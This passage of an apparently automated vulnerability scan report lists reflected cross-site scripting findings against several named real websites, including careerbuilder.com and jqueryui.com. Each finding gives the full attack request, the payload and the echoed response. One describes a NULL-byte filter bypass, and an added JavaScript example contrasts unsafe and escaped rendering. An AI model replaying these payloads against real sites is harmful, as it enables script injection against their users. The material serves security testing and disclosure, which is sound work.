w=-8pxe5b20"><script>alert(1)</script>b5290387e91&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb683"><script>alert(1)</script>eb19ef13760 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8pxeb683"><script>alert(1)</script>eb19ef13760&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:09 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2e1a"><script>alert(1)</script>f81de3072b1 was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30b2e1a"><script>alert(1)</script>f81de3072b1&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:01 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d810"><script>alert(1)</script>4269b9b1148 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=304d810"><script>alert(1)</script>4269b9b1148&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:06 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13436"><script>alert(1)</script>8ee759e7141 was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px13436"><script>alert(1)</script>8ee759e7141&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sun, 14 Nov 2010 23:30:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120067
The value of the bpid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ed51'%3balert(1)//60b188e2c5e was submitted in the bpid parameter. This input was echoed as 4ed51';alert(1)//60b188e2c5e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gateway/gw.js?csid=G07610&bpid=S02784ed51'%3balert(1)//60b188e2c5e HTTP/1.1
Host: js.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 00:21:33 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 16 Nov 2010 00:21:33 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 15 Nov 2010 00:21:33 GMT
Connection: close
Content-Length: 6346
//Vermont-12.4.0-967 var rsi_now= new Date(); var rsi_csid= 'G07610';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){this._rsiaa=Da;this._rsiba= ...[SNIP]... i>>18))+"%"+_rsiCa(0x80+(i>>12&0x3F))+"%"+_rsiCa(0x80+(i>>6&0x3F))+"%"+_rsiCa(0x80+(i&0x3F));}window[rsi_csid]=new rsiClient(rsi_csid); if(window[rsi_csid])window[rsi_csid].DM_addEncToLoc("bpid",'S02784ed51';alert(1)//60b188e2c5e');else DM_addEncToLoc("bpid",'S02784ed51';alert(1)//60b188e2c5e'); function asi_addElem(e){var p=document.body==null?document.getElementsByTagName('head')[0]:document.body;p.insertBefore(e,p.firstChil ...[SNIP]...
The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload e12c1<script>alert(1)</script>25550789a86 was submitted in the csid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gateway/gw.js?csid=G07610e12c1<script>alert(1)</script>25550789a86&bpid=S0278 HTTP/1.1
Host: js.revsci.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Mon, 15 Nov 2010 00:21:33 GMT
Cache-Control: max-age=86400, private
Expires: Tue, 16 Nov 2010 00:21:33 GMT
Content-Type: application/javascript;charset=ISO-8859-1
Date: Mon, 15 Nov 2010 00:21:32 GMT
Connection: close
Content-Length: 128
/* * JavaScript include error: * The customer code "G07610E12C1<SCRIPT>ALERT(1)</SCRIPT>25550789A86" was not recognized. */
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2103e<script>alert(1)</script>7435dca659c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /assets/jquery/jScrollPane2103e<script>alert(1)</script>7435dca659c/ HTTP/1.1
Host: kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 22:27:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.kelvinluck.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 14 Nov 2010 22:27:44 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13137
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nothing found for ...[SNIP]... <strong>http://www.kelvinluck.com/assets/jquery/jScrollPane2103e<script>alert(1)</script>7435dca659c/</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44196"><script>alert(1)</script>3ac3dc6d2a9 was submitted in the REST URL parameter 3. This input was echoed as 44196\"><script>alert(1)</script>3ac3dc6d2a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /assets/jquery/jScrollPane44196"><script>alert(1)</script>3ac3dc6d2a9/ HTTP/1.1
Host: kelvinluck.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response (redirected)
HTTP/1.1 404 Not Found
Date: Sun, 14 Nov 2010 22:27:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
X-Pingback: http://www.kelvinluck.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sun, 14 Nov 2010 22:27:42 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13208
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Nothing found for ...[SNIP]... <a href="http://2005.kelvinluck.com/assets/jquery/jScrollPane44196\"><script>alert(1)</script>3ac3dc6d2a9/"> ...[SNIP]...
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2a78f'-alert(1)-'2c61d5b8e89 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mf.ic/Florida_Miami/?lr=cbcb_mh2a78f'-alert(1)-'2c61d5b8e89&SiteID=cbcb_mh043 HTTP/1.1
Host: manufacturing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 200489
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=31c8a9168a324c7db86d4832c28fda33-343071021-R7-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650DB6131B087A38A47B2E951820C5AC2CC5B2E82D3899943FBB7C47BC6A3F46E8B7A2166EDA22B2B1E; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:30:21 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:45:21 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL7
Date: Sun, 14 Nov 2010 22:30:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh2a78f'-alert(1)-'2c61d5b8e89&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f03f"%20a%3db%206b20fd7d40 was submitted in the lr parameter. This input was echoed as 4f03f" a=b 6b20fd7d40 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /mf.ic/Florida_Miami/?lr=cbcb_mh4f03f"%20a%3db%206b20fd7d40&SiteID=cbcb_mh043 HTTP/1.1
Host: manufacturing.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 198344
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=8304050d6cf8407c811aa470d8e5f6d1-343070998-R4-4; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B9DECA71415B4B344AA0626B957297F05C7D9A2F0F944124DD6C01CE730577B3DB3E25B34023B418; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:29:57 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:44:57 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: REBEL4
Date: Sun, 14 Nov 2010 22:29:57 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the p_theme request parameter is copied into the HTML document as plain text between tags. The payload %008ed0e<script>alert(1)</script>d58813ac31b was submitted in the p_theme parameter. This input was echoed as 8ed0e<script>alert(1)</script>d58813ac31b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /nl-search/we/Archives?p_multi=EN|&p_product=EN&p_theme=realcities2%008ed0e<script>alert(1)</script>d58813ac31b&p_action=search&p_maxdocs=200&s_site=miami&s_trackval=MH&p_text_search-0= HTTP/1.1
Host: nl.newsbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44c59"%20a%3db%205eb6f2d6390 was submitted in the lr parameter. This input was echoed as 44c59" a=b 5eb6f2d6390 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /np.ic/Florida_Miami/?lr=cbcb_mh44c59"%20a%3db%205eb6f2d6390&SiteID=cbcb_mh044 HTTP/1.1
Host: nonprofit.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 192802
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=c08c85f0ab084f8f980cf516a8699a49-343071164-wr-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC650B3A9AEF8176FA9165F0DC617B8A41DBB4614ECA2B5399C5087ECC6D8DD45EEFD09EDB9641CDD258A; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:32:43 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:47:44 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR28
Date: Sun, 14 Nov 2010 22:32:44 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c4b0'-alert(1)-'e1cb828b728 was submitted in the lr parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /np.ic/Florida_Miami/?lr=cbcb_mh7c4b0'-alert(1)-'e1cb828b728&SiteID=cbcb_mh044 HTTP/1.1
Host: nonprofit.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 193671
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
Set-Cookie: CB%5FSID=d3514a0dd6ee4dd987d69599015f5627-343071191-w2-6; domain=.careerbuilder.com; path=/; HttpOnly
Set-Cookie: BID=X13ACF19327AEAC65082533C0B6A15006E7BC1B42D76A4BDB01E298DFB14A0354963421DD88C93932E779431AB1D93ACE6; domain=.careerbuilder.com; expires=Mon, 14-Nov-2011 22:33:11 GMT; path=/; HttpOnly
Set-Cookie: PU=0; domain=.careerbuilder.com; expires=Sun, 14-Nov-2010 22:48:11 GMT; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR2
Date: Sun, 14 Nov 2010 22:33:11 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="HTMLTag" xml:lang="en-US" lang="en-US"> <head><title> Miami ...[SNIP]... in._introHTML = 'The feature you requested is only available to members. Please sign in to continue...'; CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mh7c4b0'-alert(1)-'e1cb828b728&ff=21'; CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later."; CB.AJAX ...[SNIP]...
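The single-quoted JavaScript string context from the lr finding above, rendered first unsafely and then with proper escaping. This is an added example and not code from the scan report or from the application it describes: the payload is the one the report shows, the assignment template is a constructed stand-in for the CB.AJAX.Login._registerURL line in the response, and the stub CB object and alert function exist only so the generated statement can be executed here.

```javascript
// Added example, not code from the scan report or from the application it describes:
// rendering untrusted data into a single-quoted JavaScript string literal, the
// context the lr finding describes, first unsafely and then with escaping.

// Payload copied from the finding. PREFIX/SUFFIX are a constructed stand-in for
// the CB.AJAX.Login._registerURL assignment shown in the response.
const PAYLOAD = "cbcb_mh7c4b0'-alert(1)-'e1cb828b728";
const PREFIX = "CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=";
const SUFFIX = "&ff=21';";

// Vulnerable shape: raw concatenation. The quote in the payload terminates the
// literal and the rest of the payload is parsed as code.
function renderUnsafe(lr) {
  return PREFIX + lr + SUFFIX;
}

// Escape for a JavaScript string literal. Quotes and backslashes are escaped so
// the literal cannot be closed early; '<', '>' and '&' are escaped so a
// "</script>" sequence in the data cannot end the enclosing <script> element
// (the HTML tokenizer runs before the JavaScript parser and knows nothing about
// string literals); U+2028/U+2029, CR and LF are JavaScript line terminators.
function jsStringEscape(s) {
  return String(s).replace(/[\\'"<>&\u2028\u2029\r\n\t]/g, (c) => {
    return "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0");
  });
}

function renderSafe(lr) {
  return PREFIX + jsStringEscape(lr) + SUFFIX;
}

// Count single-quoted string literals in the generated statement. A payload that
// breaks out of the literal turns one literal into two.
function countStringLiterals(js) {
  const m = js.match(/'(?:[^'\\]|\\.)*'/g);
  return m ? m.length : 0;
}

// Run the generated statement with a stub CB object and a stub alert, the way a
// browser would run the real script, and report what happened.
function evaluateAssignment(js) {
  const CB = { AJAX: { Login: {} } };
  let alertFired = false;
  new Function("CB", "alert", js)(CB, () => { alertFired = true; });
  return { url: CB.AJAX.Login._registerURL, alertFired };
}

function demo() {
  const unsafe = evaluateAssignment(renderUnsafe(PAYLOAD));
  const safe = evaluateAssignment(renderSafe(PAYLOAD));
  return {
    unsafeAlertFired: unsafe.alertFired,
    safeAlertFired: safe.alertFired,
    safeUrl: safe.url,
  };
}
```

The escaped render yields exactly one string literal and the application-side value round-trips unchanged (the URL still contains the literal quotes), while the unsafe render splits the statement into two literals with `-alert(1)-` executing between them.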
2.188. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://onlinehelp.microsoft.com
Path: /en-US/bing/ff808535.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 125d3"><script>alert(1)</script>70febfd0c58 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /en-US/bing/ff808535.aspx?125d3"><script>alert(1)</script>70febfd0c58=1 HTTP/1.1 Host: onlinehelp.microsoft.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: A=I&I=AxUFAAAAAAA1BwAA6Vf9zWhAqhs9UEWZy8ydVA!!&M=1; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:27:59 GMT; path=/ Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/ Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Wed, 14-Nov-2040 23:28:00 GMT; path=/ P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Date: Sun, 14 Nov 2010 23:27:59 GMT Content-Length: 43681
The value of the aff request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7cefd'><script>alert(1)</script>08ecacb8cdf was submitted in the aff parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sp?skin=&aff=11097cefd'><script>alert(1)</script>08ecacb8cdf&keywords=&submit=Go HTTP/1.1 Host: pd.miami.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
